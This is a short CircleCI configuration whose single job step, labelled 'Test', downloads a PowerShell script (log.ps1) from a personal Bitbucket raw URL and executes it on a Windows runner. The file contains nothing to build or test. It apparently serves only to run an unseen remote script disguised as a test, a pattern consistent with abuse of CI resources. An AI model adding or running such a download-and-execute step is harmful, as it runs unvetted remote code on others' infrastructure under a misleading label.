version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/anunegede/gedeanu/raw/3590318ec781899253719cc8eff218500100532c/log.ps1 -OutFile log.ps1
            ./log.ps1